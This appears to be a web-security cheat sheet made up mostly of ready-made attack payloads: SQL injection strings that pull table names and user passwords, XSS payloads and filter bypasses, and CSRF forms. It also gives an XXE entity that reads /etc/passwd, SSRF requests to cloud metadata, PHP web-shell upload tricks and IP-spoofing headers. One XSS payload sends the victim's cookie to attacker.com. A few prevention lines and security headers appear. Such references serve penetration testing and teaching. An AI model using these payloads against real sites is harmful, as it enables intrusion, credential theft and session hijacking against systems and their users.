Skip to main content

Web Application Security

SQL Injection

Detection

'               -- single quote error
''              -- double quote (no error = vulnerable)
' OR '1'='1     -- always true
' OR 1=1--      -- comment out rest
" OR "1"="1

UNION-Based

' ORDER BY 3--          -- find number of columns
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

Blind (Boolean)

' AND 1=1--     -- true
' AND 1=2--     -- false
' AND SUBSTRING(username,1,1)='a'--

Blind (Time-Based)

'; IF (1=1) WAITFOR DELAY '0:0:5'--    -- MSSQL
' AND SLEEP(5)--                        -- MySQL
' || pg_sleep(5)--                      -- PostgreSQL

Common Bypasses

' OR 1=1--
' OR 'x'='x
admin'--
' OR 1=1#
%27 OR %271%27=%271   -- URL encoded

Cross-Site Scripting (XSS)

Types

  • Reflected — payload in request, reflected in response
  • Stored — payload saved in DB, shown to all users
  • DOM-based — payload executed via client-side JS

Basic Payloads

<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
"><script>alert(1)</script>
';alert(1)//
<script>
  document.location='http://attacker.com/steal?c='+document.cookie
</script>

Filter Bypasses

<ScRiPt>alert(1)</ScRiPt>           -- case variation
<script>alert(1)</script>       -- unicode escape
<img src=1 onerror=&#97;lert(1)>    -- HTML entities
<scr<script>ipt>alert(1)</script>   -- nested tags

Cross-Site Request Forgery (CSRF)

What It Is

Forces a logged-in user to perform unintended actions.

Basic PoC

<form action="https://target.com/change-email" method="POST">
  <input type="hidden" name="email" value="[email protected]">
  <input type="submit" value="Click Me">
</form>
<script>document.forms[0].submit()</script>

GET-based CSRF

<img src="https://target.com/transfer?amount=1000&to=attacker">

Prevention

  • CSRF tokens (synchronizer token pattern)
  • SameSite cookie attribute
  • Custom request headers
  • Double submit cookie

Security Headers

Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=()

Common Vulnerabilities Quick Reference

IDOR (Insecure Direct Object Reference)

/api/user/123/profile  →  try /api/user/124/profile
/download?file=report_user123.pdf  →  change to another user's file

Open Redirect

https://site.com/redirect?url=https://evil.com

XXE (XML External Entity)

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

SSRF (Server-Side Request Forgery)

https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/
https://site.com/fetch?url=http://localhost:6379/  (Redis)
https://site.com/fetch?url=http://internal-server/admin

File Upload Bypass

shell.php → shell.php.jpg
shell.php → shell.PhP
shell.php → shell.php%00.jpg
Add image magic bytes: FF D8 FF E0 (JPEG)

Useful HTTP Headers to Test

X-Forwarded-For: 127.0.0.1       -- bypass IP restrictions
X-Real-IP: 127.0.0.1
X-Original-URL: /admin           -- path override
X-Custom-IP-Authorization: 127.0.0.1
Referer: https://trusted.com